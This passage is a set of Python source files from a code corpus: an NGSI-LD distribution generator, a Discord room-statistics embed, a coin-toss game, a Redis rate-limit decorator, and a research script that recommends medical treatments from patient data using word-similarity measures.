sdmx2jsonld.common.commonclass import CommonClass\nfrom json import load\nfrom random import getrandbits\nfrom os.path import dirname, join\n\nlogger = getLogger()\n\n\nclass Distribution(CommonClass):\n def __init__(self):\n super().__init__(entity=\"Distribution\")\n self.data = {\n \"id\": \"urn:ngsi-ld:Distribution:\",\n \"type\": \"Distribution\",\n \"accessUrl\": {\n \"type\": \"Property\",\n \"value\": [\"/ngsi-ld/v1/entities?type=https://smartdatamodels.org/dataModel.SDMX/Observation\"],\n },\n \"description\": {\n \"type\": \"Property\",\n \"value\": \"Distribution of statistical data observations.\",\n },\n \"format\": {\"type\": \"Property\", \"value\": \"JSON_LD\"},\n \"language\": {\"type\": \"Property\", \"value\": list()},\n \"status\": {\"type\": \"Property\", \"value\": \"Completed\"},\n \"title\": {\"type\": \"Property\", \"value\": list()},\n \"@context\": [\n \"https://raw.githubusercontent.com/smart-data-models/dataModel.STAT-DCAT-AP/master/context.jsonld\"\n ],\n }\n\n def generate_data(self, catalogue):\n # Generate random id for the distribution\n random_bits = getrandbits(128)\n hash1 = \"%032x\" % random_bits\n self.data[\"id\"] += hash1\n\n # Title is extracted from the dcterms:title from the Catalogue\n self.data[\"title\"][\"value\"] = catalogue.data[\"title\"][\"value\"]\n\n # language es obtained from language from the Catalogue\n self.data[\"language\"][\"value\"] = catalogue.data[\"language\"][\"value\"]\n\n # accessURL is generated from the configuration file.\n config_path = dirname(dirname(dirname(__file__)))\n config_path = join(join(config_path, \"common\"), \"config.json\")\n with open(config_path) as config_file:\n config = load(config_file)\n\n self.data[\"accessUrl\"][\"value\"][0] = config[\"broker\"] + self.data[\"accessUrl\"][\"value\"][0]\n","repo_name":"flopezag/IoTAgent-Turtle","sub_path":"sdmx2jsonld/transform/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14370726825","text":"import discord\nfrom embeds import get_default_embed\nfrom resources import get_emoji, get_icon\nfrom utils import unix_timestamp, room_url, img_url\nfrom utils.formatters import format_warnings\nfrom recnetpy.dataclasses.room import Room\nfrom database import RoomStats\n\ndef room_embed(room: Room, cached_stats: RoomStats = \"None\", hide_details: bool = False) -> discord.Embed:\n \"\"\"\n Makes an embed for a single room\n \"\"\"\n \n em = get_default_embed()\n em.title = f\"^{room.name}\"\n em.url = room_url(room.name)\n \n warnings = None\n if not hide_details: \n em.set_image(url=img_url(room.image_name))\n em.description = f\"```{room.description}```\"\n thumbnail_url = get_icon(\"rro\") if room.is_rro else get_icon(\"ugc\")\n em.set_thumbnail(url=thumbnail_url)\n \n # Warnings\n warnings = format_warnings(room.warnings)\n custom_warning = f\"```{room.custom_warning}```\"\n \n if warnings: em.add_field(name=\"Warnings\", value=\" \".join(warnings), inline=False)\n if room.custom_warning: em.add_field(name=\"Custom Warning\", value=custom_warning, inline=False)\n else:\n em.set_thumbnail(url=img_url(room.image_name))\n \n # Player retention \n retention = round(room.visit_count / room.visitor_count, 2) if room.visitor_count > 0 else 0\n \n # Cheer ratio\n cheer_ratio = round((room.cheer_count / room.visitor_count) * 100, 2) if room.visitor_count > 0 else 0\n \n cheer_dif, favorite_dif, visitor_dif, visit_dif, last_check = 0, 0, 0, 0, 0\n if cached_stats not in (\"None\", None):\n cheer_dif = room.cheer_count - cached_stats.cheers if room.cheer_count != cached_stats.cheers else 0\n favorite_dif = room.favorite_count - cached_stats.favorites if room.favorite_count != cached_stats.favorites else 0\n visitor_dif = room.visitor_count - cached_stats.visitors if room.visitor_count - cached_stats.visitors else 0\n visit_dif = room.visit_count - cached_stats.visits if room.visit_count != cached_stats.visits else 0\n last_check = cached_stats.cached_timestamp\n \n statistics = [\n f\"{get_emoji('cheer')} `{room.cheer_count:,}`{f' *(+{cheer_dif:,})*' if cheer_dif else ''} — Cheers\",\n f\"{get_emoji('favorite')} `{room.favorite_count:,}`{f' *(+{favorite_dif:,})*' if favorite_dif else ''} — Favorites\",\n f\"{get_emoji('visitors')} `{room.visitor_count:,}`{f' *(+{visitor_dif:,})*' if visitor_dif else ''} — Visitors\",\n f\"{get_emoji('visitor')} `{room.visit_count:,}`{f' *(+{visit_dif:,})*' if visit_dif else ''} — Visits\",\n f\"{get_emoji('visitors')} `{retention}` — Average Revisits\",\n f\"{get_emoji('cheer')} `{cheer_ratio}%` — Cheer to Visitor Ratio\"\n ]\n \n if last_check:\n statistics.append(f\"\\nYou last checked this room out {unix_timestamp(last_check, 'R')}!\")\n elif cached_stats != \"None\":\n statistics.append(f\"\\nYou can see the statistical difference the next time you view this room!\")\n \n if statistics:\n em.add_field(name=\"Statistics\", value=\"\\n\".join(statistics), inline=False)\n \n em.set_footer(text=\"Information is cut due to API limitations. We are working with Rec Room to bring back data.\", icon_url=get_icon(\"rectnet\"))\n\n return em\n\n\nasync def fetch_room_embed(room: Room, *args, **kwargs) -> discord.Embed:\n \"\"\"\n Fetches the necessary data and returns the embed\n \"\"\"\n room = await room.client.rooms.fetch(room.id, 78)\n return room_embed(room, *args, **kwargs)","repo_name":"RecNetBot-Development/RecNetBot","sub_path":"embeds/room_embed.py","file_name":"room_embed.py","file_ext":"py","file_size_in_byte":3535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"31549352034","text":"# First we import the \"random\" module\nimport random\n\n# Now we create a function name head_or_tails (I couldn't think of any professional name)\n\ndef head_or_tails():\n\n# Now i created a variable coin which i assigned to a list which containes heads or tails\n# and then gave to the random.choice function which i later assigned to computer, the reason\n# why i used the .lower() function is because some people might write it in uppercase or lowercase\n# you can make it whatever case suits you\n\n coin = ['Heads', 'Tails']\n computer = random.choice(coin).lower()\n\n# After that i took the input from the user and lowercased it, Why you may ask its written ↑ \n# then i printed computer so it can be sure that we know what came\n\n user = input(\"Heads or tails ? \").lower()\n print(computer)\n\n# Now, you might be able to tell what this code means, right.\n# No, well heres a brief explanation\n# We used an if statement to see if the the value the user chosed si equal to the value computer chose\n# If it is true we print you win if fase you lose\n\n if user == computer:\n print(\"You win!\")\n else:\n print(\"You lose.\")\n\n# Now the real code begins here\n# We use a while loop and give it a condition that do you want to play and took he users input and lowercased it\n# Now, if the you chose No you whould break the while loop and will not be able to play and brek out of the loop\n# But if you chose yes you will later on continue the loop and later be able to play\n\nwhile True:\n print(\"Do you want to play?:\")\n human = input(\"Yes or No : \").lower()\n\n if human == \"no\":\n print(\"bye bye\")\n break\n elif human != \"yes\":\n print(\"Invalid Input\")\n continue\n\n head_or_tails()\n\n# Hope you like it\n","repo_name":"alikhan819/My-Portfolio","sub_path":"Coin.py","file_name":"Coin.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39411519799","text":"from functools import wraps\n\nfrom rate_limit.core import RedisRateLimiter\n\nAPI = 'API'\n\n\ndef rate_limit(system=None, redis_url=None, limit=1, window=1, blocking_timeout=None, request_method=None):\n '''\n :param system: Имя вашего приложения либо константа 'Api'\n :param redis_url: Адрес redis\n :param limit: Разрешенное количество запросов\n :param window: Временное окно в секундах в котором выполняется разрешенное количество запросов\n :param blocking_timeout: Время ожидания блокировки исходящих запросов\n :param request_method: Базовый адрес запроса (шаблон урла)\n :return: response\n '''\n def decorator(func):\n if system == API or system.upper() == API:\n @wraps(func)\n def wrapper(request, *args, **kwargs):\n request_method = request.method\n user = request.user\n url_pattern = str(request.resolver_match.route)\n method_name = f\"{request_method} {url_pattern}\"\n redis_ratelimiter = RedisRateLimiter(\n system=system,\n key=method_name,\n redis_url=redis_url,\n limit=limit,\n window=window,\n blocking_timeout=blocking_timeout,\n user=user\n )\n is_limited = redis_ratelimiter.is_limited()\n if is_limited:\n return func(request, *args, **kwargs)\n return redis_ratelimiter.limited()\n else:\n @wraps(func)\n def wrapper(*args, **kwargs):\n method_name = kwargs.get(\"method_name\")\n if method_name:\n kwargs.pop(\"method_name\")\n if not method_name:\n method_name = args[0].base_url\n if method_name:\n if request_method:\n method_name = f\"{request_method} {method_name}\"\n\n return RedisRateLimiter(\n system=system,\n key=method_name,\n redis_url=redis_url,\n limit=limit,\n window=window,\n blocking_timeout=blocking_timeout,\n ).redis_rate_limit(func, *args, **kwargs)\n else:\n return func(*args, **kwargs)\n return wrapper\n\n return decorator\n","repo_name":"allkotraz/django-rate-limit","sub_path":"decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"27293559518","text":"import pandas as pd\nimport numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom sklearn.model_selection import train_test_split\nfrom wordcloud import WordCloud\nimport spacy\nimport spacy.cli\n# spacy.cli.download(\"en_core_web_lg\")\n# import en_core_web_lg\n# nlp = en_core_web_lg.load()\nimport requests\nimport re\nimport csv\nimport math\nimport sys\nfrom collections import Counter\nimport nltk\n# nltk.download('punkt')\n# nltk.download('wordnet')\nfrom nltk.corpus import wordnet as wn\n# nltk.download('brown')brown\nfrom nltk.corpus import brown\nimport random\n\n\n\"\"\" load \"\"\"\nplt.ion()\ndf = pd.read_csv('/Users/xs/PycharmProjects/TREATRCOMM/data/patients_data.csv')\nprint(df.info(), df.head())\n\n\"\"\" preprocessing \"\"\"\nprint(df.isna().sum())\nnull_num = df.isna()['Treatment'].sum()\nprint (f\"Percentage of missing value in \\' Treatment \\' is {null_num * 100 /df.shape[0]} % \")\nplt.figure() # figsize=(15,7)\nplt.bar(df.columns, df.isna().sum())\nplt.title('Missing value for each columns')\nplt.xlabel('Columns')\nplt.ylabel('Number of Missing Values')\n\ndf.dropna(subset=['Treatment'], inplace=True)\nprint(df.isna().sum())\n\n\"\"\" data cleaning \"\"\"\n# remove words not belong to the treatments\nl = ['Fatigue', 'Anxious mood','Pain', 'Insomnia', 'Skin pain', 'Psoriatic plaques (scaly patches)', 'swelling)']\nrecord = set()\nfor index, row in df.iterrows():\n new = re.split(',|\"', row['Treatment'])\n for word in l:\n if word in new:\n record.add(index)\ndf.drop(list(record), inplace=True)\ndf.reset_index(drop=True, inplace=True)\n\ndf.sort_values('Condition', ascending=True, inplace=True)\ndf.reset_index(drop=True, inplace=True)\nprint(f\"Final size of the dataset is: {df.shape[0]}\")\n\n\"\"\" EDA \"\"\"\nclass EDA:\n def __init__(self):\n pass\n\n\nclass Mapping(EDA):\n\n # create mapping\n def one_to_n_mapping(self, df, mapping_from, mapping_to):\n feature_name = df[mapping_from].unique()\n mapping = dict()\n visited = set()\n for feature in feature_name:\n if feature not in visited:\n visited.add(feature)\n mapping[feature] = set()\n for feature in feature_name:\n new = df.loc[df[mapping_from] == feature]\n for index, row in new.iterrows():\n results = row[mapping_to].split(',')\n for result in results:\n mapping[feature].add(result)\n return mapping\n\n def n_to_one_mapping(self, df, mapping_from, mapping_to):\n visited = set()\n mapping = dict()\n for index, row in df.iterrows():\n new = re.split(',|\"', row[mapping_from])\n for feature in new:\n if feature not in visited and feature:\n visited.add(feature)\n mapping[feature] = set()\n\n m = self.one_to_n_mapping(df, mapping_to, mapping_from)\n for index, row in df.iterrows():\n new = re.split(',|\"', row[mapping_from])\n for feature in new:\n for m_key, m_value in m.items():\n if feature not in m_value:\n continue\n mapping[feature].add(m_key)\n return mapping\n\n\nclass Visualization(EDA):\n\n # word cloud visualization\n def word_cloud(self, df, mapping_from, mapping=None):\n if mapping:\n res = ''\n for feature in df[mapping_from].unique():\n a = mapping[feature]\n k = ' '.join(a)\n res += k\n else:\n df_feature = df[mapping_from]\n res = ' '.join(df_feature)\n\n wordcloud = WordCloud(width=1000, height=500, background_color='white').generate(res)\n plt.figure()\n plt.imshow(wordcloud, interpolation=\"bilinear\")\n plt.axis('off')\n\n def top_n_visualization(self, dictionary, first_n=10, xlabel=None, ylabel=None):\n plt.figure()\n sns_2 = sns.barplot(x=list(dictionary.keys())[:first_n], y=list(dictionary.values())[:first_n])\n sns_2.set_title(\"Most {} frequent {}\".format(first_n, xlabel))\n sns_2.set_xlabel(xlabel)\n sns_2.set_ylabel(\"Number of {}\".format(ylabel))\n plt.xticks(rotation=45)\n\n\nmap = Mapping()\n\n# each condition will have n treatments\nmapping_condition_treatment = map.one_to_n_mapping(df, mapping_from='Condition', mapping_to='Treatment')\nprint('condition-treatments: ', mapping_condition_treatment)\n\n# each condition will have n symptoms\nmapping_condition_symptom = map.one_to_n_mapping(df, mapping_from='Condition', mapping_to='Symptom')\n\n# each symptom occurs in n conditions\nmapping_symptom_condition = map.n_to_one_mapping(df, mapping_from='Symptom', mapping_to='Condition')\n\n# each treatment occurs in n conditions\nmapping_treatment_condition = map.n_to_one_mapping(df, mapping_from='Treatment', mapping_to='Condition')\n\nprint(len(mapping_condition_treatment['ADD (Attention Deficit Disorder)']))\nprint(\"number of unique conditions:\", len(df['Condition'].unique()))\nprint('\\n')\ncondition_dict = df['Condition'].value_counts()\nprint(condition_dict)\n\n# Most n frequent Conditions\nvs = Visualization()\ncondition_dict = dict(condition_dict)\nvs.top_n_visualization(condition_dict, first_n=10, xlabel=\"Conditions\", ylabel=\"Patients\")\nprint('condition-observations: ', condition_dict)\nprint(len(condition_dict))\n\ncondition_length_dict = {key: len(value) for key, value in mapping_condition_treatment.items()}\ncondition_length_dict = dict(sorted(condition_length_dict.items(), key=lambda x: x[1], reverse=True))\nvs.top_n_visualization(condition_length_dict, first_n=10, xlabel=\"Conditions\", ylabel=\"Treatments\")\nprint('condition-treatments: ', condition_length_dict)\nprint(len(condition_length_dict))\n\n# Most n frequent Treatments\ntreatment_length_dict = {key: len(value) for key, value in mapping_treatment_condition.items()}\ntreatment_length_dict = dict(sorted(treatment_length_dict.items(), key=lambda x: x[1], reverse=True))\nvs.top_n_visualization(treatment_length_dict, first_n=10, xlabel=\"Treatments\", ylabel=\"Conditions\")\nprint('treatment-conditions: ', treatment_length_dict)\nprint(len(treatment_length_dict))\n\n# Most n frequent Symptoms\nsymptom_length_dict = {key: len(value) for key, value in mapping_symptom_condition.items()}\nsymptom_length_dict = dict(sorted(symptom_length_dict.items(), key=lambda x: x[1], reverse=True))\nvs.top_n_visualization(symptom_length_dict, first_n=10, xlabel=\"Symptoms\", ylabel=\"Conditions\")\nprint('symptom-conditions: ', symptom_length_dict)\nprint(len(symptom_length_dict))\n\n# # Word cloud of condition frequency\n# vs.word_cloud(df, mapping_from='Condition')\n#\n# # Word cloud of treatment for different conditions\n# vs.word_cloud(df, 'Condition', mapping_condition_treatment)\n#\n# # Word cloud of symptoms for different conditions\n# vs.word_cloud(df, 'Condition', mapping_condition_symptom)\n\n\n\"\"\" train test split \"\"\"\n\n\"\"\" Recommendation \"\"\"\nnew_df = df.drop(columns=['Name', 'City', 'State'])\n# data = new_df.to_numpy()\ndata_train, data_test, y_train, y_test = train_test_split(new_df.iloc[:, :-1], new_df.iloc[:, -1], test_size=0.2, random_state=0)\ndata_train = pd.concat([data_train, y_train], axis=1).to_numpy()\ndata_test = data_test.to_numpy()\ny_test = y_test.to_numpy()\n\nALPHA = 0.2\nBETA = 0.45\nETA = 0.4\nPHI = 0.2\nDELTA = 0.85\n\nbrown_freqs = dict()\nN = 0\n\nWORD = re.compile(r'\\w+')\nsymp_list = []\nsymptoms_list = []\nsymp_similar = []\nfinal_list = []\ni = 0\nthreshold_val = 0.4\n\n\nclass WordSimilarity:\n def get_best_synset_pair(self, word_1, word_2):\n max_sim = -1.0\n synsets_1 = wn.synsets(word_1)\n synsets_2 = wn.synsets(word_2)\n if len(synsets_1) == 0 or len(synsets_2) == 0:\n return None, None\n else:\n max_sim = -1.0\n best_pair = None, None\n for synset_1 in synsets_1:\n for synset_2 in synsets_2:\n sim = wn.path_similarity(synset_2, synset_1)\n if sim > max_sim:\n max_sim = sim\n best_pair = synset_1, synset_2\n return best_pair\n\n def length_dist(self, synset_1, synset_2):\n l_dist = sys.maxsize\n if synset_1 is None or synset_2 is None:\n return 0.0\n if synset_1 == synset_2:\n l_dist = 0.0\n else:\n wset_1 = set([str(x.name()) for x in synset_1.lemmas()])\n wset_2 = set([str(x.name()) for x in synset_2.lemmas()])\n if len(wset_1.intersection(wset_2)) > 0:\n l_dist = 1.0\n else:\n l_dist = synset_1.shortest_path_distance(synset_2)\n if l_dist is None:\n l_dist = 0.0\n return math.exp(-ALPHA * l_dist)\n\n def hierarchy_dist(self, synset_1, synset_2):\n\n h_dist = sys.maxsize\n if synset_1 is None or synset_2 is None:\n return h_dist\n if synset_1 == synset_2:\n # return the depth of one of synset_1 or synset_2\n h_dist = max([x[1] for x in synset_1.hypernym_distances()])\n else:\n # find the max depth of least common ancestor\n hypernyms_1 = {x[0]: x[1] for x in synset_1.hypernym_distances()}\n hypernyms_2 = {x[0]: x[1] for x in synset_2.hypernym_distances()}\n lcs_candidates = set(hypernyms_1.keys()).intersection(\n set(hypernyms_2.keys()))\n if len(lcs_candidates) > 0:\n lcs_dists = []\n for lcs_candidate in lcs_candidates:\n lcs_d1 = 0\n if lcs_candidate in hypernyms_1:\n lcs_d1 = hypernyms_1[lcs_candidate]\n lcs_d2 = 0\n if lcs_candidate in hypernyms_2:\n lcs_d2 = hypernyms_2[lcs_candidate]\n lcs_dists.append(max([lcs_d1, lcs_d2]))\n h_dist = max(lcs_dists)\n else:\n h_dist = 0\n return ((math.exp(BETA * h_dist) - math.exp(-BETA * h_dist)) /\n (math.exp(BETA * h_dist) + math.exp(-BETA * h_dist)))\n\n def word_similarity(self, word_1, word_2):\n synset_pair = self.get_best_synset_pair(word_1, word_2)\n return (self.length_dist(synset_pair[0], synset_pair[1]) *\n self.hierarchy_dist(synset_pair[0], synset_pair[1]))\n\n # def word_similarity(self, word_1, word_2):\n # synset_pair = self.get_best_synset_pair(word_1, word_2)\n # if not synset_pair[0] or not synset_pair[1]:\n # return 0\n # return synset_pair[0].wup_similarity(synset_pair[1])\n\n\nclass TextualSimilarity(WordSimilarity):\n\n def cosine_similarity(self, vec1, vec2):\n\n intersection = set(vec1.keys()) & set(vec2.keys())\n numerator = sum([vec1[x] * vec2[x] for x in intersection])\n\n sum1 = sum([vec1[x] ** 2 for x in vec1.keys()])\n sum2 = sum([vec2[x] ** 2 for x in vec2.keys()])\n denominator = math.sqrt(sum1) * math.sqrt(sum2)\n\n if not denominator:\n return 0.0\n else:\n return float(numerator) / denominator\n\n def tokenize(self, text):\n\n words = WORD.findall(text)\n return Counter(words)\n\n def textual_similarity(self, text1, text2):\n\n vector1 = self.tokenize(text1.lower())\n vector2 = self.tokenize(text2.lower())\n cosine = self.cosine_similarity(vector1, vector2)\n return cosine\n\n\nclass SentenceSimilarity(WordSimilarity):\n\n def most_similar_word(self, word, word_set):\n\n max_sim = -1.0\n sim_word = \"\"\n for ref_word in word_set:\n sim = self.word_similarity(word, ref_word)\n if sim > max_sim:\n max_sim = sim\n sim_word = ref_word\n return sim_word, max_sim\n\n def info_content(self, lookup_word):\n\n global N\n if N == 0:\n for sent in brown.sents():\n for word in sent:\n word = word.lower()\n if word not in brown_freqs:\n brown_freqs[word] = 0\n brown_freqs[word] = brown_freqs[word] + 1\n N = N + 1\n lookup_word = lookup_word.lower()\n n = 0 if lookup_word not in brown_freqs else brown_freqs[lookup_word]\n return 1.0 - (math.log(n + 1) / math.log(N + 1))\n\n def semantic_vector(self, words, joint_words, info_content_norm):\n\n sent_set = set(words)\n semvec = np.zeros(len(joint_words))\n i = 0\n for joint_word in joint_words:\n if joint_word in sent_set:\n semvec[i] = 1.0\n if info_content_norm:\n semvec[i] = semvec[i] * math.pow(self.info_content(joint_word), 2)\n else:\n sim_word, max_sim = self.most_similar_word(joint_word, sent_set)\n semvec[i] = PHI if max_sim > PHI else 0.0\n if info_content_norm:\n semvec[i] = semvec[i] * self.info_content(joint_word) * self.info_content(sim_word)\n i = i + 1\n return semvec\n\n def semantic_similarity(self, sentence_1, sentence_2, info_content_norm):\n\n words_1 = nltk.word_tokenize(sentence_1)\n words_2 = nltk.word_tokenize(sentence_2)\n temp_words = words_1 + words_2\n joint_words = sorted(list(set(words_1).union(set(words_2))), key=temp_words.index)\n vec_1 = self.semantic_vector(words_1, joint_words, info_content_norm)\n vec_2 = self.semantic_vector(words_2, joint_words, info_content_norm)\n return np.dot(vec_1, vec_2.T) / (np.linalg.norm(vec_1) * np.linalg.norm(vec_2))\n\n def word_order_vector(self, words, joint_words, windex):\n\n wovec = np.zeros(len(joint_words))\n i = 0\n wordset = set(words)\n for joint_word in joint_words:\n if joint_word in wordset:\n for w_i, word in enumerate(words):\n if word == joint_word:\n wovec[i] = w_i + 1\n else:\n sim_word, max_sim = self.most_similar_word(joint_word, wordset)\n if max_sim > ETA:\n wovec[windex[joint_word]] = windex[sim_word] + 1\n else:\n wovec[windex[joint_word]] = 0\n i = i + 1\n return wovec\n\n def isfloat(self, value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n def word_order_similarity(self, sentence_1, sentence_2):\n\n words_1 = nltk.word_tokenize(sentence_1)\n words_2 = nltk.word_tokenize(sentence_2)\n temp_word = words_1 + words_2\n joint_words = sorted(list(set(words_1).union(set(words_2))), key=temp_word.index)\n windex = {x[1]: x[0] for x in enumerate(joint_words)}\n r1 = self.word_order_vector(words_1, joint_words, windex)\n r2 = self.word_order_vector(words_2, joint_words, windex)\n return 1.0 - (np.linalg.norm(r1 - r2) / np.linalg.norm(r1 + r2))\n\n def sentence_similarity(self, sentence_1, sentence_2, info_content_norm):\n\n return DELTA * self.semantic_similarity(sentence_1, sentence_2, info_content_norm) + \\\n (1.0 - DELTA) * self.word_order_similarity(sentence_1, sentence_2)\n\n\nclass RecommendationSystem:\n\n def __init__(self, data, top_k, top_n):\n self.txtsim = TextualSimilarity()\n self.sentsim = SentenceSimilarity()\n self.data = data\n self.top_k_users = top_k\n self.top_n_recommendations = top_n\n\n def find_similar_symptoms(self, user_symptom):\n similar_list = []\n file = open('/Users/xs/PycharmProjects/TREATRCOMM/data/symptoms_similar.txt', 'r')\n\n for line in file:\n line = line.rstrip('\\n')\n symptoms_file = line.split('\\t')\n\n for symp in user_symptom:\n if symp == symptoms_file[0]:\n for item in symptoms_file:\n similar_list.append(item)\n break\n\n # textual similarity: cosine similarity\n text_sim = self.txtsim.textual_similarity(symp, symptoms_file[0])\n # semantic similarity + word order similarity\n semantic_val = self.sentsim.sentence_similarity(symp, symptoms_file[0], True)\n if self.sentsim.isfloat(semantic_val):\n semantic_sim = float(semantic_val)\n else:\n semantic_sim = 0.0\n if text_sim > 0.75 or semantic_sim > threshold_val:\n for item in symptoms_file:\n similar_list.append(item)\n break\n\n # use conceptnet to find similar symptoms (query)\n for symp in user_symptom:\n symptom = symp.lower().replace(' ', '_')\n obj = requests.get('http://api.conceptnet.io/query?node=/c/en/' + symptom + '&start=/c/en&end=/c/en&rel=/r/Synonym').json()\n for link in obj['edges']:\n word1 = link['end']['label']\n word2 = link['start']['label']\n similar_list.append(word1)\n similar_list.append(word2)\n\n return list(set(similar_list))\n\n def find_similar_patients(self, user_symptom, user_disease, age, gender):\n\n # use ConceptNet to find user_symptom and user_disease synonyms\n fuzzy_user_disease = []\n user_disease_slash = re.sub(r\"\\(.*?\\)|\\{.*?}|\\[.*?]\", \"\", user_disease.lower()).strip().replace(' ', '_')\n p1 = re.compile(r'[(](.*?)[)]', re.S)\n user_disease_parenthesis = re.findall(p1, user_disease.lower())\n if user_disease_parenthesis:\n user_disease_parenthesis = user_disease_parenthesis[0].strip().replace(' ', '_')\n obj2 = requests.get(\n 'http://api.conceptnet.io/query?node=/c/en/' + user_disease_parenthesis + '&start=/c/en&end=/c/en&rel=/r/Synonym').json()\n for link2 in obj2['edges']:\n word3 = link2['end']['label']\n word4 = link2['start']['label']\n fuzzy_user_disease.append(word3.lower())\n fuzzy_user_disease.append(word4.lower())\n # print(user_disease_slash)\n # print(user_disease_parenthesis)\n\n obj = requests.get(\n 'http://api.conceptnet.io/query?node=/c/en/' + user_disease_slash + '&start=/c/en&end=/c/en&rel=/r/Synonym').json()\n for link in obj['edges']:\n word1 = link['end']['label']\n word2 = link['start']['label']\n fuzzy_user_disease.append(word1.lower())\n fuzzy_user_disease.append(word2.lower())\n\n fuzzy_user_disease.append(user_disease)\n fuzzy_user_disease = list(set(fuzzy_user_disease))\n print(fuzzy_user_disease)\n\n # 找相似的symptom,和input的symptom合并\n similar_symptom = self.find_similar_symptoms(user_symptom)\n # print('similar symptom', similar_symptom)\n\n for i, item in enumerate(similar_symptom):\n similar_symptom[i] = item.lower()\n user_symp_len = len(user_symptom)\n user_symptom = user_symptom + similar_symptom\n symptom_list = list(set(user_symptom))\n for i, item in enumerate(symptom_list):\n symptom_list[i] = item.strip('\\r')\n # print('symptom_list', symptom_list)\n\n similarity = []\n top_treatments = []\n\n for row in self.data:\n patient_gender, patient_age, conditions, symptoms_to_check, patient_treatments = row[0], row[1], row[2],\\\n row[3].split(','), row[4]\n\n # user input disease not same to the condition in current check row, next row\n for fuzzy in fuzzy_user_disease:\n if fuzzy.lower() not in conditions.lower():\n continue\n\n # if same\n for i, symptom in enumerate(symptoms_to_check):\n symptoms_to_check[i] = symptom.lower()\n common_symptom = [symptom for symptom in symptom_list if symptom.lower() in symptoms_to_check]\n similarity_val = float(len(common_symptom) / (len(symptoms_to_check) + user_symp_len))\n if (similarity_val, patient_gender, patient_age, patient_treatments) in similarity:\n continue\n\n similarity.append((similarity_val, patient_gender, patient_age, patient_treatments))\n\n similarity.sort(reverse=True)\n print('similarity', similarity)\n\n # matching patients\n users_matched = 0\n for value, p_gender, p_age, p_treatments in similarity:\n # return top k similar patients\n if users_matched == self.top_k_users:\n break\n\n # filter: gender, difference of age > 5, similarity = 0\n if p_gender.lower() != gender.lower() or abs(int(p_age) - int(age)) > 20 or value == 0:\n continue\n\n # find treatments from similar patients\n tms = p_treatments.split(',')\n for tm in tms:\n top_treatments.append(tm)\n users_matched += 1\n\n # recommend treatments\n treatments = dict()\n for treatment in top_treatments:\n treatments[treatment] = treatments.get(treatment, 0) + 1\n treatments = dict(sorted(treatments.items(), key=lambda x: x[1], reverse=True))\n # print('similar conditions', fuzzy_user_disease, '\\nsimilar symptoms', symptom_list)\n print('treatment dict:', treatments)\n top_n_treatments = list(treatments)[:self.top_n_recommendations]\n print('final top N treatment', top_n_treatments)\n return top_n_treatments\n\n def collaborative_filter(self, symptom, disease, age, gender):\n\n user_symptom = symptom.split(',')\n for i, item in enumerate(user_symptom):\n user_symptom[i] = item.lower()\n\n return self.find_similar_patients(user_symptom, disease, age, gender)\n\n\nclass ReferenceSystem:\n \"\"\" Reference System: Trivial and Baseline \"\"\"\n def __init__(self, data, k):\n self.data = data\n self.top_k = k\n\n def trivial_system(self, run_time=10):\n pass\n # random recommendation\n treatment_index = random.randint(0, len(treatment_length_dict) - 1)\n treatment_number = random.randint(0, 10)\n\n # run more than 10 times to take avg:\n # trivial 1. random recommendation base on index without any prior knowledge (658 * length choose randint?)\n # trivial 2. random choose k patients (similar to recommend top k in RS) and\n # combine their treatments as the y_pred (658 * (k1 + k2 + ...))\n\n def baseline_system(self):\n pass\n\n # baseline 1. POP (popular products): this model recommends the most popular products in the training set.\n # (658 * length choose randint?)\n # baseline 2. random recommendation within condition-treatments mapping (658 * length choose randint?)\n # baseline 3. recommend top k frequent treatments within condition-treatments mapping (658 * k) 教授:根据这个symptom的最常用的treatment来推荐,topk就推荐k个最常见的\n\n # Q: length of the prediction? 5? random int?\n\n\ndef evaluation(model, reference):\n \"\"\" Evaluation \"\"\"\n # Micro precision (joint1 + joint2 + ... / yhat1 + yhat2 + ...), recall, f1\n\n count = 0\n record = dict()\n xgrid_min, xgrid_max = 0, -sys.maxsize\n y_len, y_hat_len, total_intercept = 0, 0, 0\n for i in range(len(data_test)):\n count += 1\n print('==='*20)\n print('Patient No.' + str(count), data_test[i])\n symptom, condition, age, gender = data_test[i][3], data_test[i][2], data_test[i][1], data_test[i][0]\n if reference == 'trivial':\n y_pred = model.trivial_system(symptom, condition, age, gender)\n elif reference == 'baseline':\n y_pred = model.baseline_system(symptom, condition, age, gender)\n else:\n y_pred = model.collaborative_filter(symptom, condition, age, gender)\n xgrid_min, xgrid_max = 0, max(xgrid_max, len(y_pred))\n record[len(y_pred)] = record.get(len(y_pred), 0) + 1\n print('recommendation:', y_pred)\n y_true = y_test[i].split(',')\n print('y_true', y_true)\n total_intercept += len(set(y_true).intersection(set(y_pred)))\n\n y_len += len(y_true)\n y_hat_len += len(y_pred)\n print(total_intercept, y_len, y_hat_len)\n precision_k = total_intercept / y_hat_len\n recall_k = total_intercept / y_len\n f1_k = (2 * precision_k * recall_k) / (precision_k + recall_k)\n print('top{} similar patients, with top{} treatments precision = {}, recall = {}, f1 = {}'.format(k, n, precision_k, recall_k, f1_k))\n plt.figure()\n plt.title('Distribution of the length of prediction')\n plt.bar(*zip(*record.items()))\n plt.xlabel('Length of the prediction')\n plt.ylabel('Number of Datapoints')\n\n\nif __name__ == '__main__':\n \"\"\" no sentence semantic similarity; fuzzy search; w+h distance measure; visited set \"\"\"\n k = 3\n n = 3\n\n # trivial system\n # rfs_trivial = ReferenceSystem(data=data_train, top_k=k)\n # evaluation(rfs_trivial, 'trivial')\n #\n # # baseline system\n # # Pop : POP (popular products): this model recommends the most popular products in the training set.\n # # [python]https://github.com/ss87021456/Recommendation-System-Baseline\n # rfs_baseline = ReferenceSystem(data=data_train, top_k=k)\n # evaluation(rfs_baseline, 'baseline')\n\n # CF\n trs = RecommendationSystem(data=data_train, top_k=k, top_n=n)\n evaluation(trs, 'rs')\n\n\n\n\n# line = ['Female', 41, 'Rheumatoid Arthritis (RA)', 'Depressed 